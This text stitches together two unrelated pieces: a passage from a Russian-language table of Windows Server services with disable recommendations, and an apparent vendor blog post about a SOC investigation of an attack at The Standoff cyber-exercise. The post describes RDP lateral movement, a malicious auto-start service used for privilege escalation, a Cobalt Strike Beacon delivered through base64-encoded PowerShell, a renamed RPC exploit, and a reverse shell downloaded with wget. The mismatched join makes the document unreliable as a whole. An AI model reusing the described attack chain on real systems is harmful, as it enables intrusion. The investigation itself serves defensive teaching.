Description Позволяет размещать устройства UPnP на этом компьютере. Если эта служба остановлена, все размещенные устройства UPnP перестанут работать и никакие дополнительные размещенные устройства невозможно будет добавить. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Служба ведения журнала доступа пользователей

Имя Описание
Имя службы UALSVC
Description Эта служба регистрирует (в виде IP-адресов и имен пользователей) уникальные клиентские запросы на доступ, отправляемые установленными продуктами или ролями на локальном сервере. Эту информацию могут запрашивать администраторы (через Powershell), которым требуется оценить количество клиентских запросов к серверному программному обеспечению для автономного управления клиентскими лицензиями. Если служба отключена, клиентские запросы не будут регистрироваться и не будут доступны с помощью запросов Powershell. Остановка службы не влияет на запросы исторических данных (см. шаги по удалению исторических данных в сопроводительной документации). Локальному системному администратору требуется изучить условия лицензионного соглашения на использование Windows Server, чтобы определить количество клиентских лицензий, необходимых для надлежащего лицензирования серверного программного обеспечения. Использование службы и данных UAL не изменяет эту обязанность.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Доступ к данным пользователя

Имя Описание
Имя службы UserDataSvc
Description Предоставляет приложениям доступ к структурированным данным пользователя, включая контактную информацию, календари, сообщения и другое содержимое. Если вы остановите или отключите эту службу, приложения, использующие эти данные, могут работать неправильно.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Шаблон пользовательской службы

Хранилище данных пользователя

Имя Описание
Имя службы UnistoreSvc
Description Управляет хранением структурированных данных пользователя, включая контактную информацию, календари, сообщения и другое содержимое. Если вы остановите или отключите эту службу, приложения, использующие эти данные, могут работать неправильно.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Шаблон пользовательской службы

Служба виртуализации взаимодействия с пользователем

Имя Описание
Имя службы UevAgentService
Description Обеспечивает поддержку приложений и роуминга параметров ОС.
Установка Только с возможностями рабочего стола
Тип запуска Выключено
Рекомендация Уже отключена
Комментарии нет

Диспетчер пользователей

Имя Описание
Имя службы UserManager
Description Диспетчер пользователей предоставляет компоненты среды выполнения, необходимые для взаимодействия с несколькими пользователями. Если эта служба остановлена, некоторые приложения могут не работать должным образом.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Служба профилей пользователей

Имя Описание
Имя службы ProfSvc
Description Эта служба отвечает за загрузку и выгрузку профилей пользователей. Если эта служба остановлена или отключена, пользователи не могут успешно входить в систему и выполнять выход, в приложениях могут возникать ошибки при обращении к данным пользователей, а компоненты, зарегистрированные для получения уведомлений о событиях профилей, не получат их.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Виртуальный диск

Имя Описание
Имя службы vds
Description Предоставляет службы управления дисками, томами, файловыми системами и массивами хранения данных.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

служба теневого копирования томов;

Имя Описание
Имя службы VSS.
Description Управляет созданием теневых копий томов, которые используются для резервного копирования и восстановления или для иных целей. Если эта служба остановлена, теневые копии томов для восстановления не будут доступны и резервное копирование может не работать. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

WalletService

Имя Описание
Имя службы WalletService
Description Содержит объекты, используемые клиентами кошелька.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Windows Audio

Имя Описание
Имя службы Audiosrv
Description Управляет аудио в программах на базе Windows. Если эта служба остановлена, звуковые устройства и эффекты не будут работать должным образом. Если эта служба отключена, любые службы, которые явно зависят от нее, не могут быть запущены.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Средство построения конечных точек Windows Audio

Имя Описание
Имя службы AudioEndpointBuilder
Description Управляет звуковыми устройствами для службы Windows Audio. Если эта служба остановлена, звуковые устройства и эффекты не будут работать должным образом. Если эта служба отключена, любые службы, которые явно зависят от нее, не могут быть запущены.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Биометрическая служба Windows

Имя Описание
Имя службы WbioSrvc
Description Биометрическая служба Windows предназначена для сбора, сравнения, обработки и хранения биометрических данных в клиентских приложениях без получения непосредственного доступа к биометрическим образцам или оборудованию. Эта служба размещается в привилегированном процессе SVCHOST.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Сервер кадров Камеры Windows

Имя Описание
Имя службы FrameServer
Description Позволяет нескольким клиентам получать доступ к видеокадрам с камер.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Диспетчер подключений Windows

Имя Описание
Имя службы Wcmsvc
Description Принимает решения об автоматическом подключении или отключении, исходя из доступных для ПК параметров подключения к сети, и позволяет управлять подключениями к сети на основе параметров групповой политики.
Установка Только с возможностями рабочего стола
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Служба проверки сети Защитника Windows

Имя Описание
Имя службы WdNisSvc
Description Обеспечивает защиту от попыток вторжения, направленных на известные и недавно обнаруженные уязвимости в сетевых протоколах.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба Защитника Windows

Имя Описание
Имя службы WinDefend
Description Обеспечивает защиту от вредоносных и других потенциально нежелательных программ.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Windows Driver Foundation — среда выполнения платформы драйвера режима пользователя

Имя Описание
Имя службы wudfsvc
Description Создает процессы драйвера режима пользователя и управляет ими. Эту службу нельзя остановить.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба узла поставщика шифрования Windows

Имя Описание
Имя службы WEPHOSTSVC
Description Служба узла поставщика шифрования Windows является брокером между функциями шифрования, предоставляемыми сторонними поставщиками, и процессами, которым требуется оценивать и применять политики EAS. При остановке этой службы станут недействительными проверки соответствия EAS, которые были установлены подключенными учетными записями почты.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба отчеты об ошибках Windows

Имя Описание
Имя службы WerSvc
Description Разрешает отправку отчетов об ошибках в случае прекращения работы или реагирования программы на запросы, а также разрешает доставку имеющихся решений. Разрешает также создание журналов для служб диагностики и восстановления. Если эта служба остановлена, то могут не работать отчеты об ошибках и не отображаться результаты служб диагностики и восстановления.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии Собирает и отправляет данные аварийного завершения или зависаний, используемые как Майкрософт, так и сторонними независимыми поставщиками программного обеспечения и независимыми поставщиками оборудования. Данные используются для диагностики ошибок, вызывающих сбои, которые могут содержать ошибки безопасности. Требуется также для корпоративных отчетов об ошибках.

Сборщик событий Windows

Имя Описание
Имя службы Wecsvc
Description Эта служба управляет постоянными подписками на события от удаленных источников, поддерживающих протокол WS-Management. Сюда входят журналы событий Windows Vista, оборудование, а также источники с интерфейсом IPMI. Эта служба хранит пересылаемые события в локальном журнале событий. Если эта служба остановлена или отключена, подписки на события не могут быть созданы и отправленные события не могут быть приняты.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии Собирает события трассировки событий Windows (включая события безопасности) для управляемости и диагностики. Множество компонентов и средств сторонних разработчиков зависят от службы, в том числе средства аудита безопасности.

Журнал событий Windows

Имя Описание
Имя службы EventLog
Description Эта служба управляет событиями и журналами событий. Она поддерживает регистрацию и запрос событий, подписку на события, архивацию журналов и управление метаданными событий. События могут отображаться в формате XML и текстовом формате. Остановка этой службы может снизить безопасность и надежность системы.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Брандмауэр Windows

Имя Описание
Имя службы MpsSvc
Description Брандмауэр Windows помогает защитить компьютер, предотвращая попытки несанкционированных пользователей получить доступ к компьютеру через Интернет или из сети.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Служба кэширования шрифтов Windows

Имя Описание
Имя службы FontCache
Description Оптимизирует производительность приложений, кэшируя наиболее часто используемые данные о шрифтах. Приложения будут запускать эту службу, если она еще не выполняется. Отключение службы может привести к снижению производительности приложения.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Служба загрузки изображений (WIA)

Имя Описание
Имя службы stisvc
Description Предоставляет службы получения изображений со сканеров и цифровых камер.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Служба предварительной оценки Windows

Имя Описание
Имя службы wisvc
Description wisvc
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Сервер не поддерживает фокус-тестирование, поэтому на сервере эта операция отсутствует. Компонент также можно отключить с помощью групповой политики.

Установщик Windows

Имя Описание
Имя службы msiserver
Description Добавляет, изменяет и удаляет приложения, предоставляемые в виде пакета установщика Windows (*.msi, *.msp). Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба диспетчера лицензирования Windows

Имя Описание
Имя службы LicenseManager
Description Обеспечивает поддержку инфраструктуры для Microsoft Store. Эта служба запускается по требованию, и, если она отключена, содержимое, полученное через Microsoft Store, не будет работать должным образом.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Инструментарий управления Windows (WMI)

Имя Описание
Имя службы Winmgmt
Description Предоставляет общий интерфейс и объектную модель для доступа к информации об управлении операционной системой, устройствами, приложениями и службами. После остановки данной службы многие Windows-приложения могут работать некорректно. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Служба Windows Mobile Hotspot

Имя Описание
Имя службы icssvc
Description Предоставляет возможность обмениваться мобильными данными с другим устройством.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Установщик модулей Windows

Имя Описание
Имя службы TrustedInstaller
Description Позволяет устанавливать, изменять и удалять обновления Windows и дополнительные компоненты. Если эта служба отключена, установка или удаление обновлений Windows на этом компьютере может завершиться сбоем.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба системы push-уведомлений Windows

Имя Описание
Имя службы WpnService
Description Эта служба запускается в сеансе 0 и служит местом размещения платформы уведомлений и поставщика подключений, обрабатывающего соединение между устройством и сервером WNS.
Установка Только с возможностями рабочего стола
Тип запуска Автоматически
Рекомендация Можно отключить
Комментарии Требуется для динамических плиток и других функций

Пользовательская служба push-уведомлений Windows

Имя Описание
Имя службы WpnUserService
Description Эта служба размещает платформу уведомлений Windows, которая обеспечивает поддержку локальных и push-уведомлений. Поддерживаются уведомления на плитке, всплывающие и необработанные уведомления.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Шаблон пользовательской службы

Удаленное управление Windows (WS-Management)

Имя Описание
Имя службы WinRM
Description Служба удаленного управления Windows (WinRM) реализует протокол WS-Management для удаленного управления. WS-Management — это стандартный протокол веб-служб, используемый для удаленного управления программным обеспечением и оборудованием. Служба WinRM прослушивает сеть для запросов WS-Management и обрабатывает их. Служба WinRM должна быть настроена с прослушивателем с помощью средства командной строки winrm.cmd или групповой политики, чтобы она прослушивала сеть. Служба WinRM предоставляет доступ к данным WMI и включает сбор событий. Сбор событий и подписка на события требуют запуска службы. Сообщения WinRM используют HTTP и HTTPS в качестве транспорта. Служба WinRM не зависит от СЛУЖБ IIS, но предварительно настроена для предоставления общего доступа к порту с IIS на том же компьютере. Служба WinRM резервирует префикс URL-адреса /wsman. Чтобы предотвратить конфликты с IIS, администраторы должны убедиться, что все веб-сайты, размещенные в IIS, не используют префикс URL-адреса /wsman.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Не отключать
Комментарии Требуется для удаленного управления

Поиск Windows

Имя Описание
Имя службы WSearch
Description Обеспечивает индексацию содержимого, кэширование свойств и результаты поиска файлов, электронной почты и другого содержимого.
Установка Только с возможностями рабочего стола
Тип запуска Выключено
Рекомендация Уже отключена
Комментарии нет

Служба времени Windows

Имя Описание
Имя службы W32Time
Description Управляет синхронизацией даты и времени на всех клиентах и серверах в сети. Если эта служба остановлена, синхронизация даты и времени не будет доступна. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Центр обновления Windows

Имя Описание
Имя службы wuauserv
Description Включает обнаружение, скачивание и установку обновлений для Windows и других программ. Если эта служба отключена, то на этом компьютере нельзя будет использовать клиентский компонент Центра обновления Windows либо возможности автоматического обновления и программы не смогут использовать API Агента обновления Windows (WUA).
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба автоматического обнаружения веб-прокси WinHTTP

Имя Описание
Имя службы WinHttpAutoProxySvc
Description WinHTTP реализует стек клиента HTTP и обеспечивает разработчикам API Win32 и компонент автоматизации COM для отправки запросов HTTP и получения ответов. Кроме того, WinHTTP обеспечивает поддержку автоматического обнаружения конфигурации прокси через реализацию протокола WPAD (Web Proxy Auto-Discovery).
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии Все компоненты, которые используют сетевой стек, могут функционально зависеть от этой службы. Многие организации используют эту службу для настройки маршрутизации HTTP-подключений прокси-сервера в своих внутренних сетях. Без этого внутренние HTTP-подключения к Интернету не будут работать.

Служба автонастройки проводного доступа

Имя Описание
Имя службы dot3svc
Description Служба Wired AutoConfig (DOT3SVC) отвечает за проверку подлинности IEEE 802.1X в интерфейсах Ethernet. Если текущее развертывание проводных сетей использует проверку подлинности 802.1X, необходимо настроить службу DOT3SVC для возможности подключения уровня 2 и предоставления доступа к сетевым ресурсам. На проводные сети, не использующие проверку подлинности 802.1X, служба DOT3SVC не влияет.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Адаптер производительности WMI

Имя Описание
Имя службы wmiApSrv
Description Предоставляет сведения из библиотеки производительности от поставщиков инструментария управления Windows (WMI) клиентам сети. Эта служба доступна только при активации модуля поддержки данных производительности.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Рабочая станция

Имя Описание
Имя службы LanmanWorkstation
Description Создает и поддерживает клиентские сетевые подключения к удаленным серверам по протоколу SMB. Если эта служба будет остановлена, эти подключения станут недоступными. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Диспетчер проверки подлинности Xbox Live.

Имя Описание
Имя службы XblAuthManager
Description Предоставляет службы аутентификации и авторизации для взаимодействия с Xbox Live. Если эта служба остановлена, некоторые приложения могут не работать должным образом.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Следует отключить
Комментарии нет

Сохранение игр на Xbox Live.

Имя Описание
Имя службы XblGameSave
Description Эта служба синхронизирует данные сохранения игр для Xbox Live с поддержкой сохранения. Если эта служба остановлена, данные сохранения игры не будут передаваться в Xbox Live или скачиваться оттуда.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Следует отключить
Комментарии Эта служба синхронизирует данные сохранения игр для Xbox Live с поддержкой сохранения. Если эта служба остановлена, данные сохранения игры не будут передаваться в Xbox Live или скачиваться оттуда.

Письмо ценой катастрофы: расследуем атаку на The Standoff, используя продукты Positive Technologies

Привет! В мае прошел очередной, уже 11-й, PHDays, а вместе с ним и The Standoff, и мы, как обычно, не остались без кейсов интересных атак. В этот раз мы решили не описывать отдельные техники и тактики по матрице MITRE ATT&CK, ведь ни одна атака не возникает на пустом месте: всегда есть конкретный вектор проникновения в систему, путь продвижения по инфраструктуре и в конечном счете реализованное недопустимое событие. Предлагаем сосредоточиться на этом, так что приготовьтесь к полноценному расследованию!

В течение четырех дней кибербитвы Государство F подвергалось атакам со всех сторон. В мероприятии принимали участие 17 команд атакующих, под их натиском пали нефтегазовая, энергетическая, транспортная отрасли, в сеть были слиты персональные данные сотрудников, украдены конфиденциальные документы, целые сети были заражены вирусами-шифровальщиками. Но, конечно, самыми впечатляющими были атаки на автоматизированные системы управления технологическим процессом (АСУ ТП). Нет, не потому, что они заставляют макет ожить, а потому, что атаки на промышленные системы в реальной жизни разрушительны, несут огромные риски и могут привести к человеческим жертвам. Также такие атаки сложнее в реализации: промышленные системы вынесены в отдельный изолированный сегмент, доступ к которому ограничен. Кроме того, реализация недопустимых событий в промышленном сегменте, по правилам нашей кибербитвы, приносила команде атакующих больше всего очков.

The Standoff — это самая масштабная в мире открытая кибербитва. Главной темой учений, прошедших в мае, стал эффект бабочки: зрители и участники битвы увидели, как реализация недопустимого события в одной отрасли экономики может повлиять на другие и на все государство в целом. На площадке в Москве было построено виртуальное Государство F с тремя отраслями производства: черной металлургией, электроэнергетикой и нефтяной промышленностью. Внутри каждой отрасли экономики были представлены взаимосвязанные объекты и смоделированы производственные процессы, начиная от добычи ресурсов и заканчивая поставкой продукции конечным потребителям. Также в экономике Государства F было представлено несколько других сегментов (транспорт, банковская система и ЖКХ), каждый из которых тоже состоял из набора объектов. Чтобы найти слабые места в защите этих объектов, управляемых системами, использующимися в реальной жизни, собрались 157 исследователей безопасности из 17 команд. Атакующие искали уязвимости и пытались реализовать инциденты, например, вызвать коллапс в аэропорту или остановить работу нефтезавода. За четыре дня The Standoff атакующие реализовали недопустимые события 63 раза, 30 из них были уникальными.

Напомним, что традиционно в противостоянии принимают участие и команды защиты, которые наблюдают за происходящим на The Standoff, используя продукты Positive Technologies: продукт для глубокого анализа трафика PT NAD (PT Network Attack Discovery), систему мониторинга событий ИБ и выявления инцидентов в реальном времени MaxPatrol SIEM, межсетевой экран уровня приложений PT Application Firewall, систему анализа технологического трафика PT ISIM (PT Industrial Security Incident Manager) и песочницу PT Sandbox. Сегодня мы, PT Expert Security Center, заглянем в каждый из них и продемонстрируем, как совокупность продуктов позволяет воссоздать полную цепочку действий атакующих. Также мы покажем, на что именно специалистам SOC (security operation center) нужно обращать внимание, чтобы заметить и остановить хакеров еще на подходе к критичным системам, пока они не успели реализовать недопустимое для компании событие.

Отправная точка расследования

Рисунок 1. Недопустимое событие, реализованное командой атакующих

Так как телетрапом управляет SCADA-система (supervisory control and data acquisition — диспетчерское управление и сбор данных), мы начнем наш разбор с анализа технологического трафика с помощью PT ISIM и посмотрим, что продукт смог зафиксировать:

Рисунок 2. Инциденты из сегмента SCADA airportboarding, обнаруженные PT ISIM и отфильтрованные по времени

  • трапу была отправлена команда с IP-адреса 10.156.22.134 — узла оператора SCADA-системы;
  • удаленное подключение по RDP к узлу оператора было осуществлено за несколько минут до аварии с IP-адреса 10.156.22.25.

Наш следующий шаг — выяснить, кто и откуда получил доступ по RDP к узлу оператора. В этом нам поможет MaxPatrol SIEM: отфильтруем нужный нам узел и посмотрим входы по RDP (RemoteInteractive, события msgid = 4624 и logon_type = 10). Сгруппируем их по именам пользователей, которые осуществляли вход, и посмотрим адреса подключения.

Рисунок 3. Входы по RDP на узел оператора SCADA

Мы видим, что кроме оператора никто не заходил по RDP на узел. А еще обратим внимание, что все RDP-сессии осуществлены с одного IP-адреса (10.156.22.25). Самая первая успешная RDP-сессия была установлена еще накануне вечером. Проанализировав активность на узле airportboarding, мы не обнаружили ничего интересного: не было ни сканов, ни принесенного инструментария для атак на промышленные сети — ничего. Можем предположить, что, войдя по RDP, атакующие увидели открытую консоль управления телетрапом и, дождавшись момента посадки пассажиров, отодвинули его. В этом случае разумнее всего перейти к анализу происходящего со следующим узлом (10.156.22.25), с которого был получен доступ к узлу оператора SCADA-системы, и поискать артефакты действий атакующего там.

Анализируя события с comp-54.hv-logistics.stf (10.156.22.25), мы можем выяснить, какие процессы обращались к порту 3389 на узле оператора SCADA-системы (10.156.22.134). Мы видим, что за интересующий нас промежуток времени к порту обращались два процесса: nmap.exe и lsysnetworkrestricted.exe. Первый — это общеизвестный инструмент для сканирования и поиска открытых портов, который активно используют в атаках на инфраструктуру и пентестеры, и реальные злоумышленники. Назначение второго процесса непонятно. Тут может быть несколько вариантов: либо это кастомизированный клиент RDP, либо инструментарий для туннелирования трафика, либо другой сетевой сканер. Давайте разбираться.

Рисунок 4. Процессы, открывающие соединение по порту RDP на узел оператора SCADA

Посмотрим, что это за файл lsysnetworkrestricted.exe и откуда он взялся. Начнем с события запуска процесса (msgid in [1, 4688]). Стоит обратить внимание на то, что у файла отсутствуют метаинформация и исходное имя (original_name), а еще он был запущен от имени NT Authority\System. Файл располагается в папке C:\Windows\System32, но не относится к Windows. Мы можем сделать вывод, что этот файл создан атакующими и они смогли получить системные привилегии на узле comp-54.hv-logistics.stf (10.156.22.25).

Рисунок 5. Событие старта процесса lsysnetworkrestricted.exe

Далее мы находим событие создания файла. Проанализировав события c msgid = 11 (Sysmon), мы обнаруживаем, что этот исполняемый файл был создан процессом powershell.exe с PID (process identifier) 2224. PowerShell — один из незаменимых инструментов атакующих, поэтому Microsoft предоставили аналитикам SOC отличные события его аудита. Зная PID родительского процесса powershell.exe, мы анализируем события 4103 и 4104 (журнал Microsoft-Windows-PowerShell) и обнаруживаем скачивание файла с помощью командлета Invoke-WebRequest. Также мы видим, что команда выполнялась от имени пользователя r_flores_admin.

Рисунок 6. События скачивания файла lsysnetworkrestricted.exe

Теперь в центре нашего внимания оказывается пользователь r_flores_admin. Проделываем трюк, который мы уже использовали ранее: смотрим, откуда, как и когда был осуществлен вход от имени этого пользователя. Оказывается, что это вновь RDP-сессия с узла rdg.hv-logistivs.stf (10.156.26.21). Но пока не будем забегать вперед и смотреть, что же происходило на том узле, — остановимся на самом факте входа. Из этого события мы можем извлечь крайне полезную информацию — ID сеанса. Он позволит нам собрать всю активность пользователя в рамках этой RDP-сессии, что бывает полезно при реагировании на инцидент. Мы можем посмотреть запущенные в рамках сессии процессы, найти возможные артефакты атакующих и потенциальные способы закрепления в системе.

Рисунок 7. Событие входа r_flores_admin на comp-54.hv-logistics.stf (10.156.22.25)Рисунок 8. Установка службы на comp-54.hv-logistics.stf (10.156.22.25) для повышения привилегий и закрепления в системе

Мы обнаружили, что в рамках этой сессии r_flores_admin создал сервис с исполняемым файлом WWIHost.exe, тем самым повысив свои привилегии до SYSTEM. Имя службы было выбрано такое, чтобы она была похожа на системную и не выделялась (спасибо за то, что пытаетесь скрываться!). Обратите внимание на поля object.property и object.type: их значения свидетельствуют о том, что служба стартует автоматически (тип 2); то есть атакующие не только повысили права, но и закрепились в системе. Ранее нам уже встречался процесс wwihost.exe, но в качестве родительского для lsysnetworkrestricted.exe. То есть он был запущен от SYSTEM, так как наследует эти права от wwihost.exe, запущенного как сервис.

Очень часто хакерские инструментарии оставляют за собой следы, по которым можно классифицировать то или иное ПО.

Например, модуль Impacket smbexec использует технику service execution для выполнения команд с повышенными привилегиями. Он создает в целевой системе службу, имя которой зафиксировано автором в коде скрипта (BTOBTO). Так как иногда атакующие забывают поменять эту строку (а иногда ленятся), это может стать отличным индикатором использования Impacket smbexec.

По таким следам правила корреляций MaxPatrol SIEM и правила PT NAD умеют обнаруживать большую часть популярных (и не очень) инструментов, используемых в атаках: модули фреймворков Metasploit Framework, Koadic и Cobalt Strike, инструменты из набора Impacket, Mimikatz, Rubeus и множество других.

Аналитики SOC, возлюбите msgid = 1 (Sysmon)! В отличие от штатного логирования старта процесса в Windows (msgid = 4688), Sysmon предоставляет больше информации и дает больше контекста. Например, ничем не примечательный 1.exe оказывается эксплойтом для свежей уязвимости в RPC (CVE-2022-26809). Значения метаинформации и исходного имени файла задаются на этапе сборки исполняемого файла, но если атакующие используют готовый инструмент и просто переименовывают его исполняемый файл, чтобы скрыться, то Sysmon позволит вам легко это вычислить.

Рисунок 9. Переименованный эксплойт для свежей уязвимости CVE-2022-26809

Серверный сегмент

Итак, вернемся к нашей цепочке. Расследование приводит нас на узел rdg.hv-logistivs.stf (10.156.26.21), с которого авторизовывался r_flores_admin. Так как на практике сегмент АСУ ТП защищается особо тщательно, получить доступ к узлам операторов бывает непросто, дотянуться до них по сети можно далеко не отовсюду. Обычно сетевой связанностью с узлами операторов АСУ ТП обладают несколько инфраструктурных серверов (KSC, SCCM) и, возможно, несколько компьютеров из сегмента администраторов. В нашем случае такой лазейкой в сегмент SCADA стал сервер Remote Desktop Gateway.

По процедуре, описанной выше, находим процесс, осуществлявший удаленный вход по RDP (msgid in [3,5156] and dst.port = 3389). Вы знаете, что делать дальше: msgid in [1, 4688]. Смотрим, что это за процесс, кто его запустил, вытаскиваем subject.account.session_id и анализируем активность, предшествующую перемещению на следующий узел в цепочке атаки.

Нам бы тоже хотелось, чтобы атакующие показывали неизвестные, новые и интересные техники атак. Но, как и в жизни, есть подготовленный инструментарий и работающие стратегии. Поэтому и в реальности при перемещении атакующих от узла к узлу мы видим похожие события. А значит, и наши техники расследования часто оказываются однотипными.

Тут мы видим стандартное обращение от процесса mstsc.exe, родителем которого является explorer.exe. Значит, у атакующих снова был интерактивный доступ.

Рисунок 10. RDP-сессия с rdg.hv-logistivs.stf (10.156.26.21)

У нас появляется новый скомпрометированный пользователь e_puckett (который пришел с адреса 10.156.26.34). Посмотрим сработавшие правила корреляции в рамках его сессии. PowerShell, который открывает соединение на внешний адрес? Чаще всего это говорит о потенциальном соединении с С2-сервером (command and control) атакующих или же о скачивании файла (в некоторых случаях — об использовании фреймворков для проведения разведки или атак на Active Directory, например PowerSploit, BloodHound). И почти всегда это говорит о том, что с узлом что-то нечисто.

Рисунок 11. Список сработавших правил корреляций на узле rdg.hv-logistivs.stf

Мы нашли адрес, который потенциально принадлежит атакующим. В реальной жизни с ним мы делаем три вещи:

  1. Блокируем все соединения из нашей сети на этот адрес.
  2. Добавляем в IoC, чтобы при попытке подключения к указанному адресу любого узла в нашей инфраструктуре мы сразу же получали сообщение от систем защиты о критическом инциденте с высокой важностью, максимально быстро стартовали расследование и реагирование на инцидент.
  3. Проводим ретроспективный анализ и находим все узлы, которые могли оказаться под контролем атакующих (сейчас мы этого делать не будем, чтобы не заспойлерить итоги расследования, а посмотрим на этот адрес только в рамках текущего узла).

Изучим, какие события на узле связаны с указанным адресом. Так как это powershell.exe, то нам снова оказываются полезны события с msgid = 4104: видим Invoke-Expression (IEX), net.webclient, downloadstring, а затем много строк base64-encoded. Даже если вы не встречали подобного в жизни, несложно догадаться, что тут происходит. А если сталкивались с таким, то точно должны знать, что разбитый на несколько событий Base64 характерен для запуска полезной нагрузки PowerShell и доставки Cobalt Strike Beacon на узел.

Рисунок 12. Загрузка Beacon фреймворка Cobalt StrikeРисунок 13. Cработка PT NAD на Cobalt Strike, подтверждающая нашу теорию

Дальнейший анализ показал, что активность атакующих на узле была минимальной. Мы увидели запуск nmap и ping до нескольких узлов из разных сетей (в том числе до сегментов АСУ ТП и сегмента администраторов). Пользователь e_puckett не имеет прав локального администратора, но при этом мы также не увидели каких-либо попыток повысить привилегии. Это может говорить о том, что узел rdg.hv-logistics.stf (10.156.26.21) был интересен атакующим только из-за доступа практически в любой уголок сети компании. Закрепились атакующие через добавление своей полезной нагрузки в автозагрузку. Beacon Cobalt Strike использовался исключительно для проксирования трафика до интересующих хакеров целей.

Так что, следуя по цепочке перемещения хакеров, переходим к узлу iTop с адресом 10.156.26.34 (рис. 10), с которого атакующие заходили по RDP на rdg.hv-logistics.stf (10.156.26.21) под пользователем e_puckett. Находим обращения к порту 3389 от файла /tmp/la, и на самом деле в найденных событиях подозрительно все: скрипт из папки /tmp/ открывает соединение к порту 3389, еще и запущен пользователем www-data. Выглядит подозрительно, не так ли?

Рисунок 14. Обращения от файла /tmp/la к порту 3389

Выполнение команд от имени пользователя www-data говорит о потенциальной RCE- уязвимости (remote code execution) в веб-интерфейсе (возможно, с использованием веб-шелла). Каждый пентестер, даже далеко не самый опытный, знает, что при эксплуатации RCE-уязвимости в веб-приложении он получает права того пользователя, от имени которого запущен веб-сервис. Иногда ленивые администраторы серверов делают атакующим подарок в виде прав root, но в большинстве случаев это все же www-data, bitrix, сonfluence (привет, CVE-2022-26134) или пользователь, не обладающий высокими правами или даже правом на интерактивный вход.

Нужно понять, откуда взялся этот файл la. По строке запуска /tmp/la находим скачивание пользователем www-data через wget, chmod + x на /tmp/la (дает файлу право на исполнение) — обратный шелл до управляющего сервера. Довольно стандартный сценарий при эксплуатации веб-уязвимости. Аналитики SOC, обращайте внимание на то, какие команды выполняют пользователи — демоны веб-сервисов. Если внезапно www-data начинает выяснять, кто он (whoami) и где он (hostname), то следует повнимательней присмотреться к его активности.

Кстати, домен lg4.ptsecurity.net мы уже встречали ранее на узле comp-54.hv-logistics.stf (рис. 5).

Рисунок 15. Скачивание, назначение прав и исполнение файла /tmp/la

С помощью SIEM можно узнать контекст того, какие команды выполнялись, но продукты этого класса не могут сказать, что находится внутри исполняемого файла или файла скрипта. Нам остается только строить предположения. Или. Или нам на помощь приходит PT NAD, который умеет извлекать из трафика передаваемые файлы и сразу отправлять их на анализ в PT Sandbox (обратите внимание, около имени передаваемого файла появляется индикатор того, что в результате анализа файл был признан вредоносным). Стоит сделать оговорку, что это не сработает с шифрованным трафиком (HTTPS, SSH), но в MaxPatrol SIEM мы видим, что для передачи использовался HTTP (без SSL). Можем легко найти скачивание файла lg4.lin, который сохранили в /tmp/la.

